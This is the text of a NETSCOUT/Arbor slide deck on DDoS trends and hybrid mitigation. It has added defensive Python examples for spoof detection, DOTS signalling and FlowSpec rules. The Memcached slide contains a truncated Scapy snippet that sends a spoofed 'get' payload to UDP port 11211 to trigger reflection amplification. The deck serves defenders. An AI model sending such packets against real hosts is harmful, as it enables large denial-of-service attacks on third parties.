COPYRIGHT © 2018 NETSCOUT SYSTEMS, INC. | CONFIDENTIAL & PROPRIETARY 1
Agenda
• Advanced DDoS Trends
• Next Generation DDoS Protection
Security Portfolio (Enterprise / Service Provider)
Traffic Visibility: Arbor SP
DDoS Mitigation: Arbor TMS
Cloud Services: Arbor Cloud
DDoS Protection: Arbor APS
Network Visibility underpins everything we do at Arbor
The value of network visibility: amount of Internet traffic monitored by ATLAS is 1/3 of the Internet
Global Network Analysis: 140 Tbps / 300+ ISPs
Honey Pots
Internet Visibility
• Internet Health
• DDoS Attacks
• Threat Tracking
Malware Detection
• Real-time Behavior
• Family Focus
Botnet Monitoring
• Sinkhole
• Infiltration/Activity Monitoring
Advanced DDoS Attacks
§ Growing frequency and complexity of DDoS attacks:
• Multi-vector
• Micro Burst
• IoT (inside and out)
§ Growing frequency and complexity of Advanced Persistent Threats (APT campaigns):
• Phishing
• Ransomware
IoT Timeline (2016-2018)
DDoS Meets Ransomware
• DDoS discovered in Cerber ransomware
• Atypical, because DDoS hackers don't focus on other malware forms and vice versa
• Could only DoS the local network
• Indicates interest in launching DDoS within the enterprise
DDoS + IoT = Massive Attacks
• Aug.: 540 Gbps sustained attack on the Rio Olympics from opening to closing ceremony (LizardStresser)
• Sep. 20: 620 Gbps attack on KrebsOnSecurity (Mirai)
• Sep. 21: 990 Gbps attack on OVH (Mirai)
• Oct. 21: Three attacks on Dyn's managed DNS (Mirai)
First Multi-Platform IoT Seeder
• New Mirai Windows seeder targets IoT
• Mirai continues to evolve
Reaper: Default Passwords No More
• Based on Mirai
• 10-20K IoT bots
• An additional 2M IoT devices scanned but not subsumed
• Believed to be a Chinese criminal-underground DDoS-for-hire tool
• Exploited OS security flaws, not default usernames and passwords
Memcached DDoS: Record Breaking
• Combined with IP spoofing, the result is a 1.7 Tbps attack
What's Next?
• Larger, more complex, more frequent attacks for sure
• DDoS + Ransomware + IoT + Multi-Platform = Internally Launched Attacks
7.7 million
During this presentation, approx. 160,000 new IoT devices will go online.
An estimated 7.7 million (mostly vulnerable) IoT devices are connected to the Internet EVERY day. (Gartner report, Feb. 2017)
1:500,000
1:500,000 is the theoretical DDoS amplification factor for the Memcached service.
Lab test: 1:516,436
The Memcached DDoS Reflection Attack

from scapy.all import *
import binascii
# cmd = "get a a a a a a a a a a a a a a a a a a a a a a a … <729 times>"
payload = binascii.unhexlify('0001000000010000676574206120612061206120612061206120612061206120…
pkt = Ether()/IP(src="10.1.138.170", dst="172.17.10.103")/UDP(sport=80, dport=11211)/payload
sendp(pkt, iface="eth1", loop=0, verbose=False)

Attacker sends 1 packet.
Reflector sends 536,302 packets = 6.2 Gb.
31.4%
31.4% of Internet ASNs allow spoofed traffic to originate from their networks. (CAIDA Spoofer project)
1.7 Tbps
1.7 Tbps is the size of the largest DDoS attack in history (Memcached DDoS reflection attack, February 25th 2018).
Not Just Amplification/Reflection Attacks
Attack vectors:
◦ SYN-flooding
◦ ACK-flooding
◦ UDP flooding
◦ Valve Source Engine (VSE) query-flooding
◦ GRE-flooding
◦ Pseudo-random DNS label-prepending attacks (also known as DNS 'Water Torture' attacks)
◦ HTTP GET, POST and HEAD attacks
The Mirai botnet is capable of launching complex multi-vector attacks.
Application-Layer Attacks
• New Tail Attacks delay applications rather than shut them down (LSU & Ga Tech)
• Every 100 ms of delay equates to a 1% loss in sales (Amazon)
• 1 s delay (Aberdeen Group):
  • 11% drop in page views
  • 7% drop in e-commerce sales conversions
  • 16% drop in customer satisfaction
DDoS Attack Trends - Frequency
Fact: DDoS attacks are increasing in frequency.

DDoS Attack Trends - Duration
Fact: Most DDoS attacks are short in duration.
Source: Arbor Networks 12th Annual Worldwide Infrastructure Security Report

DDoS Attack Trends - Size
Fact: Most DDoS attacks are small (88% less than 2 Gbps).
Source: Arbor Networks 12th Annual Worldwide Infrastructure Security Report, ATLAS data

DDoS Attack Trends - Complexity
Fact: The modern-day DDoS attack is complex: dynamic and multi-vector.
The Mirai botnet is a modern-day multi-vector attack.
[Diagram: The Internet / BotNet -> Your ISP -> Firewall -> Your Data Center, with legitimate traffic alongside the three attack classes below]
Volumetric Attacks
◦ Large (up to 800 Gbps)
◦ Saturate links
TCP State-Exhaustion Attacks
◦ Crash stateful devices (load balancers, firewalls, IPSs)
Application Layer Attacks
◦ Low and slow, stealthy attacks
◦ Crash application servers
Source: Arbor Networks 12th Annual Worldwide Infrastructure Security Report
DDoS Attack Trends
Fact: The impact of a DDoS attack can be immediate and severe.
Penalties:
§ Organizations in breach of GDPR can be fined up to (max) 4% of annual global turnover or €20 million (whichever is greater).
§ It is important to note that these rules apply to both controllers and processors, meaning 'clouds' will not be exempt from GDPR enforcement.
To Stop Large Attacks…
Recall: DDoS attacks exceeding Internet bandwidth:
§ 41% of Enterprises
§ 61% of Data-center Operators
[Diagram: The Internet / BotNet -> Your ISP -> Firewall -> Your Data Center -> Application Servers; attack traffic arriving at the on-premises DDoS protection]
Source: Arbor Networks 12th Annual Worldwide Infrastructure Security Report
Your only option is the Cloud
[Diagram: The Internet / BotNet -> Your ISP (cloud-based mitigation, DDoS protection) -> Firewall -> Your Data Center (DDoS protection); attack traffic in, clean traffic out]
Increase in demand for managed DDoS protection services
Source: Arbor Networks 12th Annual Worldwide Infrastructure Security Report
To Stop the Smaller, Majority of Attacks…
[Diagram: The Internet / BotNet -> Your ISP -> Firewall -> Your Data Center; attack traffic]
§ Recall:
§ The vast majority of DDoS attacks are small (e.g. less than 2 Gbps)
§ And last for a short duration of time (e.g. less than 1 hr)
§ Yet they can still be multi-vector (e.g. 67%)
§ These attacks are difficult for an ISP/MSSP to detect.
You Should Deploy On-Premises Protection
[Diagram: The Internet / BotNet -> Your ISP -> Firewall -> Your Data Center; attack traffic stopped by on-premises DDoS protection]
§ Put DDoS protection on-premises.
§ In front of the most critical data centers/applications.
§ Customize policies for the applications running in those data centers.
§ Install in front of firewalls to protect them from TCP state-exhaustion attacks.
Stopping the Modern-Day DDoS Attack Requires Layered, Automated Protection
A Recommended Industry Best Practice:
[Diagram: The Internet -> Your (ISP's) Network (scrubbing center) -> Your Data Centers/Internal Networks (DDoS protection); volumetric attack vs. application attack]
1. Automatically stop application-layer DDoS attacks on premises.
2. Automatic, intelligent communication between on-prem and in-cloud protection to address dynamic attack vectors.
3. Stop large attacks in-cloud.
4. Backed by continuous threat intelligence.
Defending Against Insider Threats
• These security best practices include:
– Updating the software on all devices on a regular basis.
– Implementing full network segmentation and hardening (or isolating) vulnerable network devices and services.
– Developing a DDoS attack mitigation process.
– Utilizing flow telemetry to analyze external and internal traffic. This is necessary for attack detection, classification and traceback.
– Deploying multi-layered DDoS protection.
– Scanning for misconfigured and abusable services; this includes NTP, DNS and SSDP services, which can be used for amplification attacks.
– Implementing anti-spoofing mechanisms such as Unicast Reverse-Path Forwarding, ACLs, DHCP Snooping and IP Source Guard on all edge devices.
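Added example, not part of the NETSCOUT deck: the flow-telemetry and anti-spoofing items above turned into two checks a defender can run over flow records. A strict uRPF check flags a flow whose source address is not routed back through the interface it arrived on (the same property that the CAIDA Spoofer figure earlier in the deck measures at the ASN level), and a reflection check flags large UDP packets arriving from the amplifier ports named on the slide (NTP, DNS, SSDP) plus Memcached. The routing table, interface names and flow records are constructed sample data, and the packet-size threshold is the example's own.

```python
"""Flow-telemetry checks: strict uRPF spoof detection and reflection detection.
Added example; the routes, interfaces and flow records below are constructed."""
import ipaddress
from collections import defaultdict

# Constructed routing table: prefix -> interface that legitimately sources it.
ROUTES = {
    "192.0.2.0/24": "eth1",      # customer LAN
    "198.51.100.0/24": "eth2",   # second customer LAN
    "0.0.0.0/0": "eth0",         # default route towards the Internet
}

# UDP source ports of services commonly abused for amplification.
AMPLIFIER_PORTS = {11211: "memcached", 123: "ntp", 53: "dns", 1900: "ssdp"}

# Constructed flow records:
# (ingress_iface, src_ip, dst_ip, proto, src_port, dst_port, packets, bytes)
FLOWS = [
    ("eth1", "192.0.2.10", "203.0.113.5", "tcp", 51000, 443, 20, 3000),      # normal
    ("eth1", "10.9.9.9", "203.0.113.5", "udp", 80, 11211, 1, 1428),           # spoofed source on LAN
    ("eth0", "203.0.113.77", "192.0.2.10", "udp", 11211, 80, 2000, 2800000),  # memcached reflection
    ("eth0", "203.0.113.53", "192.0.2.10", "udp", 53, 40000, 3, 300),         # ordinary DNS replies
]


def best_route_iface(src_ip):
    """Longest-prefix match over ROUTES; returns the interface the route points at."""
    addr = ipaddress.ip_address(src_ip)
    best = None
    for prefix, iface in ROUTES.items():
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0]):
            best = (net.prefixlen, iface)
    return best[1] if best else None


def is_spoofed_strict_urpf(ingress_iface, src_ip):
    """Strict uRPF: the best route back to src_ip must point at the ingress interface."""
    return best_route_iface(src_ip) != ingress_iface


def is_amplification_response(proto, src_port, packets, nbytes, min_avg_size=1000):
    """Large UDP packets sourced from an amplifier port look like reflected responses."""
    if proto != "udp" or src_port not in AMPLIFIER_PORTS or packets == 0:
        return False
    return nbytes / packets >= min_avg_size


def analyze(flows):
    """Run both checks over the records; returns {check_name: [findings]}."""
    findings = defaultdict(list)
    for iface, src, dst, proto, sport, dport, pkts, nbytes in flows:
        if is_spoofed_strict_urpf(iface, src):
            findings["spoofed_source"].append((iface, src, dst))
        if is_amplification_response(proto, sport, pkts, nbytes):
            findings["reflection"].append((AMPLIFIER_PORTS[sport], src, dst, nbytes // pkts))
    return dict(findings)


if __name__ == "__main__":
    for check, hits in analyze(FLOWS).items():
        print(check, hits)
```

The spoof check is the per-flow view of what uRPF enforces on the router itself; running it over telemetry is useful where strict uRPF cannot be enabled on asymmetric paths, and for tracing which edge device let the spoofed flow in.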
Agenda
• Advanced DDoS Trends
• Next Generation DDoS Protection
Hybrid DDoS Mitigation
A Recommended Industry Best Practice:
[Diagram: Internet -> Service Provider (scrubbing center, volume) -> Customer (state & application)]
1. Stop session-exhaustion and application-layer DDoS attacks.
2. Intelligent communication between both environments.
3. Stop volumetric attacks in-cloud.
Improving Hybrid DDoS Mitigation
[Diagram: Internet -> Service Provider (scrubbing center, volume) -> Customer (state & application)]
1. How to deploy CPE-based protection for the masses?
2. How to make this communication open and widely supported?
3. How to scale to Terabit attacks?
MSSP View on CPE-based DDoS Protection
A growing business, but…
• Shipment of the appliance or installation of the VM
• Rack & stack, configuration and provisioning
• Maintenance
These problems do not look specific to DDoS mitigation appliances.
Cloud CPE or Telco Cloud Universal CPE
DDoS function as a VNF:
• DDoS VNF is deployed in the Telco Cloud along with other VNFs
• DDoS VNF runs at the edge of the enterprise network on the CPE
[Diagram: Internet -> Service Provider (Telco Cloud) -> Customer]
Demonstrates Arbor's market and thought leadership
DDoS VNF Onboarding Experiences
• Onboarding of the DDoS VNF into MANO is easy
– if you don't have a HW dependency (offload of forwarding or filtering to ASIC/NPU/FPGA)
– if you support cloud-init and a REST API
• Performance is predictable
• Scaling in Cloud CPE mode is easy
– you control the compute resource
• Healing is also easy
– … because it is "merciful killing"
• Enables operators to integrate Arbor's solutions into orchestrated service delivery platforms
DDoS Open Threat Signaling (DOTS)
The documents are in the final stage:
• The informational documents are mature and will be RFCs soon.
• The protocol documents are stabilizing, and have been used as references for working implementations:
– 4 implementations exist, one of them open source.
• DOTS protocols may reach RFC status in the calendar year.
From https://datatracker.ietf.org/meeting/93/materials/slides-93-dots-3/
DOTS: how does it work?
[Diagram: DOTS client (at the attack victim) <-> DOTS server (at the mitigator)]
Signal channel: MitigationRequest, MitigationUpdate
Data channel (optional): aliases, B/W lists, filters, policies
In scope of DOTS: the DOTS client, the DOTS server and the two channels. Out of scope of DOTS: the attack victim and the mitigator themselves.
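Added example, not from the deck or from any DOTS implementation: a simulation in Python of the signal-channel exchange in the figure above. The DOTS client at the victim builds a mitigation request, the DOTS server at the mitigator accepts it only if every target prefix belongs to that client, and the client then reads the mitigation status (the MitigationUpdate). The URI path and body layout (cuid and mid in the path, a mitigation-scope body with target-prefix and lifetime, a numeric status) follow the later DOTS signal channel RFC 8782, which this 2018 deck predates; the client identifier, prefixes, authorization table and the CoAP response codes used in the replies are assumptions made for the simulation, and the CoAP/DTLS transport is omitted.

```python
"""Simulated DOTS signal-channel exchange with server-side scope authorization.
Added example; identifiers, prefixes and the authorization table are constructed."""
import ipaddress

# RFC 8782 'status' values used here.
ATTACK_MITIGATION_IN_PROGRESS = 1
ATTACK_SUCCESSFULLY_MITIGATED = 2

# Constructed: prefixes each DOTS client (by cuid) may request mitigation for.
AUTHORIZED_PREFIXES = {
    "dz6pHjaADkaFTbjr0JGBpw": ["192.0.2.0/24", "2001:db8:6401::/48"],
}


def build_mitigation_request(cuid, mid, target_prefixes, lifetime=3600, target_protocol=None):
    """DOTS client side: PUT /.well-known/dots/mitigate/cuid=.../mid=... with one scope."""
    scope = {"target-prefix": list(target_prefixes), "lifetime": lifetime}
    if target_protocol is not None:
        scope["target-protocol"] = [target_protocol]  # IANA protocol number, e.g. 17 for UDP
    return {
        "method": "PUT",
        "uri-path": f"/.well-known/dots/mitigate/cuid={cuid}/mid={mid}",
        "body": {"ietf-dots-signal-channel:mitigation-scope": {"scope": [scope]}},
    }


def _path_params(uri_path):
    """Pull cuid=... and mid=... out of the request path."""
    return dict(seg.split("=", 1) for seg in uri_path.split("/") if "=" in seg)


class DotsServer:
    """DOTS server side: starts mitigation only for prefixes the client is authorized for."""

    def __init__(self, authorized):
        self.authorized = {cuid: [ipaddress.ip_network(p, strict=False) for p in nets]
                           for cuid, nets in authorized.items()}
        self.active = {}  # (cuid, mid) -> {"scope": [...], "status": int}

    def _covered(self, cuid, prefix):
        target = ipaddress.ip_network(prefix, strict=False)
        return any(target.version == allowed.version and target.subnet_of(allowed)
                   for allowed in self.authorized.get(cuid, []))

    def handle_request(self, msg):
        """MitigationRequest: validate every target prefix before accepting."""
        params = _path_params(msg["uri-path"])
        cuid, mid = params["cuid"], int(params["mid"])
        scopes = msg["body"]["ietf-dots-signal-channel:mitigation-scope"]["scope"]
        for scope in scopes:
            for prefix in scope["target-prefix"]:
                if not self._covered(cuid, prefix):
                    # A client must not be able to trigger mitigation of someone else's addresses.
                    return {"code": "4.01 Unauthorized", "reason": f"not authorized for {prefix}"}
        self.active[(cuid, mid)] = {"scope": scopes, "status": ATTACK_MITIGATION_IN_PROGRESS}
        return {"code": "2.01 Created", "mid": mid}

    def mitigation_update(self, cuid, mid):
        """MitigationUpdate: what the client reads back for its mid."""
        entry = self.active.get((cuid, mid))
        if entry is None:
            return {"code": "4.04 Not Found"}
        return {"code": "2.05 Content",
                "body": {"ietf-dots-signal-channel:mitigation-scope":
                         {"scope": [{"mid": mid, "status": entry["status"]}]}}}

    def mark_mitigated(self, cuid, mid):
        """Mitigator reports that the attack has been handled."""
        self.active[(cuid, mid)]["status"] = ATTACK_SUCCESSFULLY_MITIGATED


if __name__ == "__main__":
    server = DotsServer(AUTHORIZED_PREFIXES)
    req = build_mitigation_request("dz6pHjaADkaFTbjr0JGBpw", 123, ["192.0.2.10/32"], target_protocol=17)
    print(server.handle_request(req))
    print(server.mitigation_update("dz6pHjaADkaFTbjr0JGBpw", 123))
```

The authorization check is the part worth keeping in mind when the communication between on-prem and in-cloud protection is opened up to many customers: the server side has to bind each client identity to the address space it may protect, otherwise a compromised or misconfigured client could pull someone else's traffic into the scrubbing center.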
Automation of FlowSpec: Rate-limit Amplification DDoS
[Diagram: Memcached amplification DDoS -> scrubbing center]
FlowSpec rule:
Protocol: UDP
SRC port: 11211
DST IP: victim/32
Action: rate-limit to 0
Automation of FlowSpec: Offload Blocking of Identified Bots
[Diagram: DDoS -> scrubbing center]
Rule 1 (UDP to random ports):
Protocol: UDP
DST IP: victim/32
Action: redirect to IP
Rule 2 (non-spoofed TCP attacks, application-layer attacks):
SRC IP: identified bot
DST IP: victim/32
Action: rate-limit to 0
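Added example, not from the deck or from Arbor software: the two "rate-limit to 0" rules from this slide and the previous one (UDP from source port 11211 to victim/32; identified bot/32 to victim/32) encoded as BGP FlowSpec NLRI per RFC 5575 together with the traffic-rate extended community, and decoded back, so the bytes an automation system announces to a router can be checked before they are sent. The victim and bot addresses are constructed; the redirect-to-IP action of the UDP rule is not encoded here.

```python
"""Encode and decode BGP FlowSpec (RFC 5575) rate-limit rules.
Added example; the victim and bot addresses are constructed."""
import ipaddress
import struct

# Component types from RFC 5575, section 4 (they must appear in ascending order).
DEST_PREFIX, SRC_PREFIX, IP_PROTO, PORT, DEST_PORT, SRC_PORT = 1, 2, 3, 4, 5, 6
IPPROTO_UDP = 17


def prefix_component(ctype, cidr):
    """Type 1/2 component: prefix length followed by only the significant address bytes."""
    net = ipaddress.IPv4Network(cidr)
    nbytes = (net.prefixlen + 7) // 8
    return bytes([ctype, net.prefixlen]) + net.network_address.packed[:nbytes]


def eq_component(ctype, value):
    """Numeric component with a single '== value' operator.
    Operator byte: bit 7 = end-of-list, bits 5-4 = value length (0:1, 1:2, 2:4 bytes), bit 0 = eq."""
    size_code = 0 if value < 0x100 else 1 if value < 0x10000 else 2
    op = 0x80 | (size_code << 4) | 0x01
    return bytes([ctype, op]) + value.to_bytes(1 << size_code, "big")


def encode_nlri(components):
    """FlowSpec NLRI: one length byte for < 240 bytes, else two bytes with a 0xF0 prefix."""
    body = b"".join(components)
    if len(body) < 240:
        return bytes([len(body)]) + body
    return bytes([0xF0 | (len(body) >> 8), len(body) & 0xFF]) + body


def traffic_rate_community(rate_bytes_per_second, asn=0):
    """Extended community type 0x80, subtype 0x06: 2-byte AS, 4-byte IEEE float rate; 0 drops."""
    return struct.pack("!BBHf", 0x80, 0x06, asn, rate_bytes_per_second)


def decode_nlri(data):
    """Inverse of encode_nlri for the component types used here; returns {type: value}."""
    length, pos = data[0], 1
    if length >= 0xF0:
        length, pos = ((length & 0x0F) << 8) | data[1], 2
    end, comps = pos + length, {}
    while pos < end:
        ctype, pos = data[pos], pos + 1
        if ctype in (DEST_PREFIX, SRC_PREFIX):
            plen, pos = data[pos], pos + 1
            nbytes = (plen + 7) // 8
            addr = data[pos:pos + nbytes] + bytes(4 - nbytes)  # re-pad to 4 bytes
            pos += nbytes
            comps[ctype] = f"{ipaddress.IPv4Address(addr)}/{plen}"
        else:
            values = []
            while True:  # walk the operator/value list until the end-of-list bit
                op, pos = data[pos], pos + 1
                size = 1 << ((op >> 4) & 0x3)
                values.append(int.from_bytes(data[pos:pos + size], "big"))
                pos += size
                if op & 0x80:
                    break
            comps[ctype] = values
    return comps


def memcached_rate_limit_rule(victim_ip):
    """Previous slide: UDP, source port 11211, destination victim/32, rate-limit to 0."""
    nlri = encode_nlri([prefix_component(DEST_PREFIX, f"{victim_ip}/32"),
                        eq_component(IP_PROTO, IPPROTO_UDP),
                        eq_component(SRC_PORT, 11211)])
    return nlri, traffic_rate_community(0.0)


def bot_block_rule(bot_ip, victim_ip):
    """This slide, rule 2: source identified bot/32, destination victim/32, rate-limit to 0."""
    nlri = encode_nlri([prefix_component(DEST_PREFIX, f"{victim_ip}/32"),
                        prefix_component(SRC_PREFIX, f"{bot_ip}/32")])
    return nlri, traffic_rate_community(0.0)


if __name__ == "__main__":
    rules = {"memcached": memcached_rate_limit_rule("203.0.113.10"),
             "bot": bot_block_rule("198.51.100.7", "203.0.113.10")}
    for name, (nlri, action) in rules.items():
        print(name, nlri.hex(), action.hex(), decode_nlri(nlri))
```

Decoding what was encoded is the cheap safeguard for an automated FlowSpec feed: a rule that accidentally matches a /0 or omits the destination prefix would rate-limit far more than the victim, and the "more FlowSpec rules in the control and data plane" concern on the next slide is also a reason to count exactly how many bytes each rule costs.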
Future of Network Integration
• Better scalability for FlowSpec support
– More FlowSpec rules supported in the control and data plane
• More granular redirection rules and rate-limiting policies using the FlowSpec interface-set
– draft-ietf-idr-flowspec-interfaceset-03
• Consistent approach to reporting on FlowSpec rules
– A lot of proprietary options available
– Is there a consensus on using NetFlow with egress_interface == 0 for dropped traffic?
– Will OpenConfig or YANG models be adopted?
• https://tools.ietf.org/html/draft-wu-idr-flowspec-yang-cfg-02
• Tighter integration with network equipment to offload additional blocking rules
Thank You.
www.netscout.com
Patrick Lin